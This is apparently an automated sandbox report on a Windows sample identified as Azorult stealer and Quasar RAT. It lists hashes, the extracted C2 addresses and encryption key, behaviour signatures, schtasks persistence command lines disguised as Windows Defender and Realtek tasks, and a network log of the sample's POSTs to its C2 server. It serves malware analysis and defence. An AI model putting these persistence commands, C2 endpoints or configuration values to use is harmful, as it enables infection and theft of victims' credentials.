Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    4s
  • max time network
    149s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    06/03/2025, 02:28 UTC

General

  • Target

    d1f112692188b7a7cd36cafc7751da401af6d5e6ff73a89ea988c553d00bd93e.exe

  • Size

    2.0MB

  • MD5

    3122ecf57731e501138565db5741fe49

  • SHA1

    5a41892c9e73afde78510c0426da994d21515e9e

  • SHA256

    d1f112692188b7a7cd36cafc7751da401af6d5e6ff73a89ea988c553d00bd93e

  • SHA512

    d49434de0cbb63f44bba3e6e57bf7471bc2ce71b6efa81c1bacbf3bcf8e6c4138526c06760cb461b46ccb0b44f2d9e2422bd37352c1f60a952dfbaa6a8be8513

  • SSDEEP

    24576:su6J33O0c+JY5UZ+XC0kGso6FaI1IXgM6YmenKKSUlmDaGJTA4Pqa6jUvOkQwKYY:2u0c++OCvkGs9Fap5aLKLkDl+dUvO9Yu

Malware Config

Extracted

Family

azorult

C2

http://0x21.in:8000/_az/

Extracted

Family

quasar

Version

1.3.0.0

Botnet

EbayProfiles

C2

5.8.88.191:443

sockartek.icu:443

Mutex

QSR_MUTEX_0kBRNrRz5TDLEQouI0

Attributes
  • encryption_key

    MWhG6wsClMX8aJM2CVXT

  • install_name

    winsock.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    win defender run

  • subdirectory

    SubDir

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • Azorult family
  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar family
  • Quasar payload 6 IoCs
  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 16 IoCs
  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Maps connected drives based on registry 3 TTPs 2 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Suspicious use of SetThreadContext 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 2 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of WriteProcessMemory 50 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\d1f112692188b7a7cd36cafc7751da401af6d5e6ff73a89ea988c553d00bd93e.exe
    "C:\Users\Admin\AppData\Local\Temp\d1f112692188b7a7cd36cafc7751da401af6d5e6ff73a89ea988c553d00bd93e.exe"
    1⤵
    • Loads dropped DLL
    • Enumerates connected drives
    • Suspicious use of SetThreadContext
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:2808
    • C:\Users\Admin\AppData\Local\Temp\vnc.exe
      "C:\Users\Admin\AppData\Local\Temp\vnc.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of WriteProcessMemory
      PID:2940
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k
        3⤵
        • Maps connected drives based on registry
        PID:2688
    • C:\Users\Admin\AppData\Local\Temp\windef.exe
      "C:\Users\Admin\AppData\Local\Temp\windef.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:3032
      • C:\Windows\SysWOW64\schtasks.exe
        "schtasks" /create /tn "win defender run" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\windef.exe" /rl HIGHEST /f
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:2392
      • C:\Users\Admin\AppData\Roaming\SubDir\winsock.exe
        "C:\Users\Admin\AppData\Roaming\SubDir\winsock.exe"
        3⤵
          PID:2764
          • C:\Windows\SysWOW64\schtasks.exe
            "schtasks" /create /tn "win defender run" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\winsock.exe" /rl HIGHEST /f
            4⤵
            • Scheduled Task/Job: Scheduled Task
            PID:588
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c ""C:\Users\Admin\AppData\Local\Temp\3dQUaooQcsag.bat" "
            4⤵
              PID:1908
              • C:\Windows\SysWOW64\chcp.com
                chcp 65001
                5⤵
                  PID:1144
                • C:\Windows\SysWOW64\PING.EXE
                  ping -n 10 localhost
                  5⤵
                  • System Network Configuration Discovery: Internet Connection Discovery
                  • Runs ping.exe
                  PID:752
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 2764 -s 1492
                4⤵
                • Program crash
                PID:360
          • C:\Users\Admin\AppData\Local\Temp\d1f112692188b7a7cd36cafc7751da401af6d5e6ff73a89ea988c553d00bd93e.exe
            "C:\Users\Admin\AppData\Local\Temp\d1f112692188b7a7cd36cafc7751da401af6d5e6ff73a89ea988c553d00bd93e.exe"
            2⤵
            • System Location Discovery: System Language Discovery
            PID:2664
          • C:\Windows\SysWOW64\schtasks.exe
            "C:\Windows\SysWOW64\schtasks.exe" /create /tn RtkAudioService64 /tr "C:\Users\Admin\btpanui\SystemPropertiesPerformance.exe" /sc minute /mo 1 /F
            2⤵
            • System Location Discovery: System Language Discovery
            • Scheduled Task/Job: Scheduled Task
            PID:1416
        • C:\Windows\system32\taskeng.exe
          taskeng.exe {542D3AE6-ECCC-4758-836E-5295C4C6056A} S-1-5-21-3692679935-4019334568-335155002-1000:BCXRJFKE\Admin:Interactive:[1]
          1⤵
            PID:2284
            • C:\Users\Admin\btpanui\SystemPropertiesPerformance.exe
              C:\Users\Admin\btpanui\SystemPropertiesPerformance.exe
              2⤵
                PID:1708
                • C:\Users\Admin\AppData\Local\Temp\vnc.exe
                  "C:\Users\Admin\AppData\Local\Temp\vnc.exe"
                  3⤵
                    PID:2384
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k
                      4⤵
                        PID:976
                    • C:\Users\Admin\AppData\Local\Temp\windef.exe
                      "C:\Users\Admin\AppData\Local\Temp\windef.exe"
                      3⤵
                        PID:1612
                      • C:\Users\Admin\btpanui\SystemPropertiesPerformance.exe
                        "C:\Users\Admin\btpanui\SystemPropertiesPerformance.exe"
                        3⤵
                          PID:112
                        • C:\Windows\SysWOW64\schtasks.exe
                          "C:\Windows\SysWOW64\schtasks.exe" /create /tn RtkAudioService64 /tr "C:\Users\Admin\btpanui\SystemPropertiesPerformance.exe" /sc minute /mo 1 /F
                          3⤵
                          • Scheduled Task/Job: Scheduled Task
                          PID:2368

                    Network

                    • flag-us
                      DNS
                      0x21.in
                      d1f112692188b7a7cd36cafc7751da401af6d5e6ff73a89ea988c553d00bd93e.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      0x21.in
                      IN A
                      Response
                      0x21.in
                      IN A
                      44.221.84.105
                    • flag-us
                      POST
                      http://0x21.in:8000/_az/
                      d1f112692188b7a7cd36cafc7751da401af6d5e6ff73a89ea988c553d00bd93e.exe
                      Remote address:
                      44.221.84.105:8000
                      Request
                      POST /_az/ HTTP/1.1
                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
                      Host: 0x21.in:8000
                      Content-Length: 97
                      Cache-Control: no-cache
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx
                      Date: Thu, 06 Mar 2025 02:28:30 GMT
                      Content-Type: text/html
                      Transfer-Encoding: chunked
                      Connection: close
                      Set-Cookie: btst=; path=/; domain=.0x21.in:8000; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                      Set-Cookie: btst=; path=/; domain=0x21.in:8000; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                      Set-Cookie: btst=576a1ee1dc00d0265dcc553301203819|212.102.63.147|1741228110|1741228110|0|1|0; path=/; domain=.0x21.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                      Set-Cookie: snkz=212.102.63.147; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                    • flag-us
                      DNS
                      0x21.in
                      d1f112692188b7a7cd36cafc7751da401af6d5e6ff73a89ea988c553d00bd93e.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      0x21.in
                      IN A
                      Response
                      0x21.in
                      IN A
                      44.221.84.105
                    • flag-us
                      POST
                      http://0x21.in/_az/
                      Remote address:
                      44.221.84.105:8000
                      Request
                      POST /_az/ HTTP/1.0
                      Host: 0x21.in
                      Connection: close
                      User-agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
                      Content-Length: 97
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx
                      Date: Thu, 06 Mar 2025 02:28:31 GMT
                      Content-Type: text/html
                      Connection: close
                      Set-Cookie: btst=557d8d2c1a452ee94ee5179c33b30844|212.102.63.147|1741228111|1741228111|0|1|0; path=/; domain=.0x21.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                      Set-Cookie: snkz=212.102.63.147; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                    • flag-us
                      DNS
                      ip-api.com
                      Remote address:
                      8.8.8.8:53
                      Request
                      ip-api.com
                      IN A
                      Response
                      ip-api.com
                      IN A
                      208.95.112.1
                    • flag-us
                      GET
                      http://ip-api.com/json/
                      Remote address:
                      208.95.112.1:80
                      Request
                      GET /json/ HTTP/1.1
                      User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0
                      Host: ip-api.com
                      Connection: Keep-Alive
                    • flag-us
                      DNS
                      freegeoip.net
                      Remote address:
                      8.8.8.8:53
                      Request
                      freegeoip.net
                      IN A
                      Response
                      freegeoip.net
                      IN A
                      3.33.130.190
                      freegeoip.net
                      IN A
                      15.197.148.33
                    • flag-us
                      GET
                      http://freegeoip.net/xml/
                      Remote address:
                      3.33.130.190:80
                      Request
                      GET /xml/ HTTP/1.1
                      User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0
                      Host: freegeoip.net
                      Connection: Keep-Alive
                      Response
                      HTTP/1.1 200 OK
                      content-type: text/html
                      date: Thu, 06 Mar 2025 02:28:43 GMT
                      content-length: 114
                    • flag-us
                      DNS
                      api.ipify.org
                      Remote address:
                      8.8.8.8:53
                      Request
                      api.ipify.org
                      IN A
                      Response
                      api.ipify.org
                      IN A
                      104.26.12.205
                      api.ipify.org
                      IN A
                      104.26.13.205
                      api.ipify.org
                      IN A
                      172.67.74.152
                    • flag-us
                      GET
                      http://api.ipify.org/
                      Remote address:
                      104.26.12.205:80
                      Request
                      GET / HTTP/1.1
                      User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0
                      Host: api.ipify.org
                      Connection: Keep-Alive
                      Response
                      HTTP/1.1 200 OK
                      Date: Thu, 06 Mar 2025 02:28:43 GMT
                      Content-Type: text/plain
                      Content-Length: 14
                      Connection: keep-alive
                      Vary: Origin
                      cf-cache-status: DYNAMIC
                      Server: cloudflare
                      CF-RAY: 91be6bda89d07755-LHR
                      alt-svc: h2=":443"; ma=60
                      server-timing: cfL4;desc="?proto=TCP&rtt=39032&min_rtt=39032&rtt_var=19516&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=142&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                    • flag-us
                      GET
                      http://ip-api.com/json/
                      Remote address:
                      208.95.112.1:80
                      Request
                      GET /json/ HTTP/1.1
                      User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0
                      Host: ip-api.com
                      Connection: Keep-Alive
                    • flag-us
                      GET
                      http://freegeoip.net/xml/
                      Remote address:
                      3.33.130.190:80
                      Request
                      GET /xml/ HTTP/1.1
                      User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0
                      Host: freegeoip.net
                      Connection: Keep-Alive
                      Response
                      HTTP/1.1 200 OK
                      content-type: text/html
                      date: Thu, 06 Mar 2025 02:28:56 GMT
                      content-length: 114
                    • flag-us
                      GET
                      http://api.ipify.org/
                      Remote address:
                      104.26.12.205:80
                      Request
                      GET / HTTP/1.1
                      User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0
                      Host: api.ipify.org
                      Connection: Keep-Alive
                      Response
                      HTTP/1.1 200 OK
                      Date: Thu, 06 Mar 2025 02:28:56 GMT
                      Content-Type: text/plain
                      Content-Length: 14
                      Connection: keep-alive
                      Vary: Origin
                      cf-cache-status: DYNAMIC
                      Server: cloudflare
                      CF-RAY: 91be6c2d7d373695-LHR
                      alt-svc: h2=":443"; ma=60
                      server-timing: cfL4;desc="?proto=TCP&rtt=34173&min_rtt=34173&rtt_var=17086&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=142&delivery_rate=0&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                    • flag-us
                      DNS
                      0x21.in
                      d1f112692188b7a7cd36cafc7751da401af6d5e6ff73a89ea988c553d00bd93e.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      0x21.in
                      IN A
                      Response
                      0x21.in
                      IN A
                      44.221.84.105
                    • flag-us
                      POST
                      http://0x21.in:8000/_az/
                      Remote address:
                      44.221.84.105:8000
                      Request
                      POST /_az/ HTTP/1.1
                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
                      Host: 0x21.in:8000
                      Content-Length: 97
                      Cache-Control: no-cache
                      Cookie: btst=576a1ee1dc00d0265dcc553301203819|212.102.63.147|1741228110|1741228110|0|1|0; snkz=212.102.63.147
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx
                      Date: Thu, 06 Mar 2025 02:29:05 GMT
                      Content-Type: text/html
                      Transfer-Encoding: chunked
                      Connection: close
                      Set-Cookie: btst=; path=/; domain=.0x21.in:8000; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                      Set-Cookie: btst=; path=/; domain=0x21.in:8000; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                      Set-Cookie: btst=576a1ee1dc00d0265dcc553301203819|212.102.63.147|1741228145|1741228110|17|2|0; path=/; domain=.0x21.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                    • flag-us
                      DNS
                      0x21.in
                      d1f112692188b7a7cd36cafc7751da401af6d5e6ff73a89ea988c553d00bd93e.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      0x21.in
                      IN A
                      Response
                      0x21.in
                      IN A
                      44.221.84.105
                    • flag-us
                      POST
                      http://0x21.in/_az/
                      Remote address:
                      44.221.84.105:8000
                      Request
                      POST /_az/ HTTP/1.0
                      Host: 0x21.in
                      Connection: close
                      User-agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
                      Content-Length: 97
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx
                      Date: Thu, 06 Mar 2025 02:29:06 GMT
                      Content-Type: text/html
                      Connection: close
                      Set-Cookie: btst=eb93f7a51db95eed89133dbe09bccd01|212.102.63.147|1741228146|1741228146|0|1|0; path=/; domain=.0x21.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                      Set-Cookie: snkz=212.102.63.147; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                    • flag-us
                      DNS
                      sockartek.icu
                      Remote address:
                      8.8.8.8:53
                      Request
                      sockartek.icu
                      IN A
                      Response
                    • 5.8.88.191:8080
                      svchost.exe
                      152 B
                      3
                    • 44.221.84.105:8000
                      http://0x21.in:8000/_az/
                      http
                      d1f112692188b7a7cd36cafc7751da401af6d5e6ff73a89ea988c553d00bd93e.exe
                      480 B
                      870 B
                      5
                      5

                      HTTP Request

                      POST http://0x21.in:8000/_az/

                      HTTP Response

                      200
                    • 44.221.84.105:8000
                      http://0x21.in/_az/
                      http
                      469 B
                      590 B
                      5
                      5

                      HTTP Request

                      POST http://0x21.in/_az/

                      HTTP Response

                      200
                    • 208.95.112.1:80
                      http://ip-api.com/json/
                      http
                      1.7kB
                      52 B
                      12
                      1

                      HTTP Request

                      GET http://ip-api.com/json/
                    • 3.33.130.190:80
                      http://freegeoip.net/xml/
                      http
                      428 B
                      604 B
                      6
                      4

                      HTTP Request

                      GET http://freegeoip.net/xml/

                      HTTP Response

                      200
                    • 104.26.12.205:80
                      http://api.ipify.org/
                      http
                      424 B
                      1.1kB
                      6
                      4

                      HTTP Request

                      GET http://api.ipify.org/

                      HTTP Response

                      200
                    • 208.95.112.1:80
                      http://ip-api.com/json/
                      http
                      1.3kB
                      52 B
                      10
                      1

                      HTTP Request

                      GET http://ip-api.com/json/
                    • 3.33.130.190:80
                      http://freegeoip.net/xml/
                      http
                      474 B
                      644 B
                      7
                      5

                      HTTP Request

                      GET http://freegeoip.net/xml/

                      HTTP Response

                      200
                    • 5.8.88.191:8080
                      152 B
                      3
                    • 104.26.12.205:80
                      http://api.ipify.org/
                      http
                      424 B
                      1.1kB
                      6
                      4

                      HTTP Request

                      GET http://api.ipify.org/

                      HTTP Response

                      200
                    • 5.8.88.191:443
                      152 B
                      3
                    • 5.8.88.191:8080
                      152 B
                      3
                    • 44.221.84.105:8000
                      http://0x21.in:8000/_az/
                      http
                      591 B
                      791 B
                      5
                      5

                      HTTP Request

                      POST http://0x21.in:8000/_az/

                      HTTP Response

                      200
                    • 44.221.84.105:8000
                      http://0x21.in/_az/
                      http
                      469 B
                      590 B
                      5
                      5

                      HTTP Request

                      POST http://0x21.in/_az/

                      HTTP Response

                      200
                    • 5.8.88.191:8080
                      152 B
                      3
                    • 5.8.88.191:8080
                      104 B
                      2
                    • 5.8.88.191:8080
                      152 B
                      3
                    • 5.8.88.191:8080
                      152 B
                      3
                    • 5.8.88.191:8080
                      52 B
                      1
                    • 5.8.88.191:8080
                      152 B
                      3
                    • 5.8.88.191:8080
                      52 B
                      1
                    • 5.8.88.191:8080
                      52 B
                      1
                    • 8.8.8.8:53
                      0x21.in
                      dns
                      d1f112692188b7a7cd36cafc7751da401af6d5e6ff73a89ea988c553d00bd93e.exe
                      53 B
                      69 B
                      1
                      1

                      DNS Request

                      0x21.in

                      DNS Response

                      44.221.84.105

                    • 8.8.8.8:53
                      0x21.in
                      dns
                      d1f112692188b7a7cd36cafc7751da401af6d5e6ff73a89ea988c553d00bd93e.exe
                      53 B
                      69 B
                      1
                      1

                      DNS Request

                      0x21.in

                      DNS Response

                      44.221.84.105

                    • 8.8.8.8:53
                      ip-api.com
                      dns
                      56 B
                      72 B
                      1
                      1

                      DNS Request

                      ip-api.com

                      DNS Response

                      208.95.112.1

                    • 8.8.8.8:53
                      freegeoip.net
                      dns
                      59 B
                      91 B
                      1
                      1

                      DNS Request

                      freegeoip.net

                      DNS Response

                      3.33.130.190
                      15.197.148.33

                    • 8.8.8.8:53
                      api.ipify.org
                      dns
                      59 B
                      107 B
                      1
                      1

                      DNS Request

                      api.ipify.org

                      DNS Response

                      104.26.12.205
                      104.26.13.205
                      172.67.74.152

                    • 8.8.8.8:53
                      0x21.in
                      dns
                      d1f112692188b7a7cd36cafc7751da401af6d5e6ff73a89ea988c553d00bd93e.exe
                      53 B
                      69 B
                      1
                      1

                      DNS Request

                      0x21.in

                      DNS Response

                      44.221.84.105

                    • 8.8.8.8:53
                      0x21.in
                      dns
                      d1f112692188b7a7cd36cafc7751da401af6d5e6ff73a89ea988c553d00bd93e.exe
                      53 B
                      69 B
                      1
                      1

                      DNS Request

                      0x21.in

                      DNS Response

                      44.221.84.105

                    • 8.8.8.8:53
                      sockartek.icu
                      dns
                      59 B
                      124 B
                      1
                      1

                      DNS Request

                      sockartek.icu

                    MITRE ATT&CK Enterprise v15

                    Replay Monitor

                    Loading Replay Monitor...

                    Downloads

                    • C:\Users\Admin\AppData\Local\Temp\3dQUaooQcsag.bat

                      Filesize

                      208B

                      MD5

                      7e3cfd68e73df269a38f23b3cb71fd6c

                      SHA1

                      2ae2b4a669e96c5042ce8b0ef4547968650ffeee

                      SHA256

                      33ff14010fd28d876f19142c08d0b389812bb3387366fe5db5696afcb20890d8

                      SHA512

                      e3d51e66d6fd5d64114b83ea78873880860275ba0fb15efca15d0abb8c53bdd09f71febae3a801b3d9b2788a16769fc07dce33481caae0af45180f8929b86dbe

                    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\5M3GNXY5.txt

                      Filesize

                      213B

                      MD5

                      9b8dc42f62fa34a9e12500c9dc7ed921

                      SHA1

                      9cadf33a3dc02d4f11e5d7742337d5f9d26fd4b9

                      SHA256

                      fc27dbb9b662c69b120cdd0747ed8fe39fceb1d28b7e92dd27f3354663a9186a

                      SHA512

                      9ba2bba9f64a4571b5796ee5271462e082b331e51c860890b929a6ea10cab73e2003c87fd1b0c71fa8595bfe45c6e38010739d1fa6c7118b3c4627b0e132e355

                    • C:\Users\Admin\btpanui\SystemPropertiesPerformance.exe

                      Filesize

                      2.0MB

                      MD5

                      671ca71c4f30eadb0e504e017979478a

                      SHA1

                      1ce79f9e434739f8605f58b6c2559f3c2f973586

                      SHA256

                      797eb576c2e91590e0363d6a203c6d949711cba98ff7cd4878a6c101d209b401

                      SHA512

                      826aac05471f9cf6fa35ffba7a3fcafe33c682a548c7c47d2df87ebf746b397f16f8dc85f5433a0bd40a9397d7b13307db0b7a88809581cb403146f9fc28a12a

                    • \Users\Admin\AppData\Local\Temp\vnc.exe

                      Filesize

                      405KB

                      MD5

                      b8ba87ee4c3fc085a2fed0d839aadce1

                      SHA1

                      b3a2e3256406330e8b1779199bb2b9865122d766

                      SHA256

                      4e8a99cd33c9e5c747a3ce8f1a3e17824846f4a8f7cb0631aebd0815db2ce3a4

                      SHA512

                      7a775a12cd5bcd182d64be0d31f800b456ca6d1b531189cea9c72e1940871cfe92ccd005938f67bfa4784ae44c54b3a7ea29a5bb59766e98c78bf53b680f2ab2

                    • \Users\Admin\AppData\Local\Temp\windef.exe

                      Filesize

                      349KB

                      MD5

                      b4a202e03d4135484d0e730173abcc72

                      SHA1

                      01b30014545ea526c15a60931d676f9392ea0c70

                      SHA256

                      7050608d53f80269df951d00883ed79815c060ce7678a76b5c3f6a2a985beea9

                      SHA512

                      632a035a3b722ea29b02aad1f0da3df5bdc38abc7e6617223790955c6c0830f1070b528680416d5c63ea5e846074cdad87f06c21c35a77b1ccc4edc089d8b1fb

                    • memory/112-104-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

                      Filesize

                      4KB

                    • memory/112-104-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

                      Filesize

                      4KB

                    • memory/976-111-0x000007FFFFFDB000-0x000007FFFFFDC000-memory.dmp

                      Filesize

                      4KB

                    • memory/976-112-0x0000000000250000-0x00000000002EC000-memory.dmp

                      Filesize

                      624KB

                    • memory/976-111-0x000007FFFFFDB000-0x000007FFFFFDC000-memory.dmp

                      Filesize

                      4KB

                    • memory/976-116-0x0000000000250000-0x00000000002EC000-memory.dmp

                      Filesize

                      624KB

                    • memory/976-112-0x0000000000250000-0x00000000002EC000-memory.dmp

                      Filesize

                      624KB

                    • memory/976-116-0x0000000000250000-0x00000000002EC000-memory.dmp

                      Filesize

                      624KB

                    • memory/1612-98-0x00000000011A0000-0x00000000011FE000-memory.dmp

                      Filesize

                      376KB

                    • memory/1612-98-0x00000000011A0000-0x00000000011FE000-memory.dmp

                      Filesize

                      376KB

                    • memory/2664-31-0x0000000000080000-0x00000000000A0000-memory.dmp

                      Filesize

                      128KB

                    • memory/2664-42-0x0000000000080000-0x00000000000A0000-memory.dmp

                      Filesize

                      128KB

                    • memory/2664-42-0x0000000000080000-0x00000000000A0000-memory.dmp

                      Filesize

                      128KB

                    • memory/2664-32-0x0000000000080000-0x00000000000A0000-memory.dmp

                      Filesize

                      128KB

                    • memory/2664-38-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

                      Filesize

                      4KB

                    • memory/2664-31-0x0000000000080000-0x00000000000A0000-memory.dmp

                      Filesize

                      128KB

                    • memory/2664-32-0x0000000000080000-0x00000000000A0000-memory.dmp

                      Filesize

                      128KB

                    • memory/2664-38-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

                      Filesize

                      4KB

                    • memory/2688-52-0x0000000000350000-0x00000000003EC000-memory.dmp

                      Filesize

                      624KB

                    • memory/2688-43-0x0000000000020000-0x0000000000021000-memory.dmp

                      Filesize

                      4KB

                    • memory/2688-45-0x000007FFFFFD4000-0x000007FFFFFD5000-memory.dmp

                      Filesize

                      4KB

                    • memory/2688-43-0x0000000000020000-0x0000000000021000-memory.dmp

                      Filesize

                      4KB

                    • memory/2688-46-0x0000000000350000-0x00000000003EC000-memory.dmp

                      Filesize

                      624KB

                    • memory/2688-52-0x0000000000350000-0x00000000003EC000-memory.dmp

                      Filesize

                      624KB

                    • memory/2688-46-0x0000000000350000-0x00000000003EC000-memory.dmp

                      Filesize

                      624KB

                    • memory/2688-45-0x000007FFFFFD4000-0x000007FFFFFD5000-memory.dmp

                      Filesize

                      4KB

                    • memory/2764-63-0x0000000000980000-0x00000000009DE000-memory.dmp

                      Filesize

                      376KB

                    • memory/2764-63-0x0000000000980000-0x00000000009DE000-memory.dmp

                      Filesize

                      376KB

                    • memory/2808-30-0x00000000007B0000-0x00000000007B1000-memory.dmp

                      Filesize

                      4KB

                    • memory/2808-30-0x00000000007B0000-0x00000000007B1000-memory.dmp

                      Filesize

                      4KB

                    • memory/3032-53-0x0000000000B90000-0x0000000000BEE000-memory.dmp

                      Filesize

                      376KB

                    • memory/3032-53-0x0000000000B90000-0x0000000000BEE000-memory.dmp

                      Filesize

                      376KB

                    We care about your privacy.

                    This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.